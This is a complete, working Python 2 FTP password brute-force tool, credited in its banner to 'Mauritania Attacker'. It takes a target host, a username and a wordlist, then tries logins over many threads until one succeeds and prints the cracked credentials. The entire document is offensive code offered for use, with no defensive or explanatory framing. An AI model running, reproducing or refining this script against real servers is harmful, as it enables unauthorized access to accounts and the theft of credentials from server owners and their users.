Ftp Brute Force

1. #!/usr/bin/python
2.  
3. import argparse, signal, Queue, time
4. from threading import Thread, Lock
5. from sys import argv, stdout
6. from os import getpid, kill
7. from ftplib import FTP, error_perm
8.  
9. class myThread (Thread):
10.     def __init__(self, threadID, name, q):
11.         Thread.__init__(self)
12.         self.threadID = threadID
13.         self.name = name
14.         self.q = q
15.     def run(self):
16.         ftpcrack(self.name, self.q)
17.  
18. class Timer():
19.     def __enter__(self): self.start = time.time()
20.     def __exit__(self, *args):
21.         taken = time.time() - self.start
22.         seconds = int(time.strftime('%S', time.gmtime(taken)))
23.         minutes = int(time.strftime('%M', time.gmtime(taken)))
24.         hours = int(time.strftime('%H', time.gmtime(taken)))
25.         if minutes > 0:
26.             if hours > 0:
27.                 print " [*] Time elapsed " + str(hours) + " hours, " + str(minutes) + " minutes and " + str(seconds) + " seconds at " + str(round(len(passwords) / taken,2)) + " trys per second."
28.             else:
29.                 print " [*] Time elapsed " + str(minutes) + " minutes and " + str(seconds) + " seconds at " + str(round(len(passwords) / taken,2)) + " trys per second."
30.         else:
31.             print " [*] Time elapsed " + str(seconds) + " seconds at " + str(round(len(passwords) / taken,2)) + " trys per second."
32.  
33. class Printer():
34.     def __init__(self,data):
35.         stdout.write("\r\x1b[K"+data.__str__())
36.         stdout.flush()
37.  
38. def ftpcrack(threadName, q):
39.     while not exitFlag:
40.         queueLock.acquire()
41.         if not workQueue.empty():
42.             password = q.get()
43.             queueLock.release()
44.             mdone = ""
45.             while not mdone:
46.                 try:
47.                     FTP(host, user, password)
48.                     print(" [*] Cracked: " + user + ":" + password + "  **-- Successful Login!")
49.                     creds = user + ":" + password
50.                     cracked.append(creds)
51.                     mdone = "1"
52.                 except error_perm:
53.                     if len(password) < 20:
54.                         add = 20 - int(len(password))
55.                         password = str(password) + " " * add
56.  
57.                     progdone = len(passwords) - workQueue.qsize()
58.                     percent = round(float(100.00) / len(passwords) * progdone,2)
59.                     token = time.time() - startcnt
60.                     eta = round(token / progdone * len(passwords) - token,2)
61.                     Printer(" [>] " + str(percent) + "% Now trying: " + str(progdone) + "/" + str(len(passwords)) + " at " + str(round(progdone / token,2)) + " tries per second    User: " + user + " Password: " + password + "  -  Unsuccessful Login  ETA: "  + str(time.strftime('%H:%M:%S', time.gmtime(eta))))
62.                     mdone = "1"
63.                 else:
64.                     pass
65.         else:
66.             queueLock.release()
67.  
68. def killpid(signum = 0, frame = 0):
69.     print "\r\x1b[K"
70.     kill(getpid(), 9)
71.  
72. parser = argparse.ArgumentParser(prog='ftpcrack', usage='ftpcrack [options]')
73. parser.add_argument('-t', "--threads", type=int, help='number of threads (default: 100)')
74. parser.add_argument('-i', "--ip", type=str, help='host to attack')
75. parser.add_argument('-u', "--user", type=str, help='username to attack')
76. parser.add_argument('-w', "--wordlist", type=str, help='wordlist')
77. args = parser.parse_args()
78.  
79. print '''
80.  __ _                             _    
81. / _| |_ _ __   ___ _ __ __ _  ___| | __
82. | |_| __| '_ \ / __| '__/ _` |/ __| |/ /
83. |  _| |_| |_) | (__| | | (_| | (__|   <
84. |_|  \__| .__/ \___|_|  \__,_|\___|_|\_\
85.        |_|                            
86.                        Developped By Mauritania Attacker
87. '''
88.  
89. if len(argv) == 1:
90.     parser.print_help()
91.     exit()
92.  
93. signal.signal(signal.SIGINT, killpid)
94. queueLock = Lock()
95. cracked = []
96. threads = []
97. creds = ""
98. exitFlag = 0
99. threadID = 1
100. maxthreads = 40
101.  
102. if args.threads:
103.     maxthreads = args.threads
104.  
105. passwords = [line.strip() for line in open(args.wordlist, 'r')]
106. user = args.user
107. host = args.ip
108.  
109. if not passwords or not user or not host:
110.     parser.print_help()
111.     exit()
112.  
113. try:
114.     connection = FTP(host, timeout=2)
115.     wlcmsg = connection.getwelcome()
116.     print wlcmsg
117.     print
118. except:
119.     print " [X] Error: it doesn't look like " + str(host) + " is an FTP server.."
120.     print
121.     exit()
122.  
123. print " [*] Loading " + str(len(passwords)) + " passwords to try.."
124.  
125. workQueue = Queue.Queue(len(passwords))
126.  
127. queueLock.acquire()
128. for passw in passwords:
129.     workQueue.put(passw)
130. queueLock.release()
131.  
132. while threadID <= maxthreads:
133.     tname = str("Thread-") + str(threadID)
134.     thread = myThread(threadID, tname, workQueue)
135.     thread.start()
136.     threads.append(thread)
137.     threadID += 1
138.  
139. startcnt = time.time()
140. print " [*] Starting attack on " + str(user) + "@" + str(host) + " with " + str(maxthreads) + " threads."
141. print
142.  
143. with Timer():
144.     while not workQueue.empty():
145.         if cracked:
146.             exitFlag = 1
147.         else:
148.             pass
149.  
150.     exitFlag = 1
151.  
152.     for t in threads:
153.         t.join()
154.  
155.     if cracked:
156.         print "\r\x1b[K\n [*] All threads has been completed, Cracked!! ^_^"
157.     else:
158.         print "\r\x1b[K\n [*] All threads has been completed, not cracked :("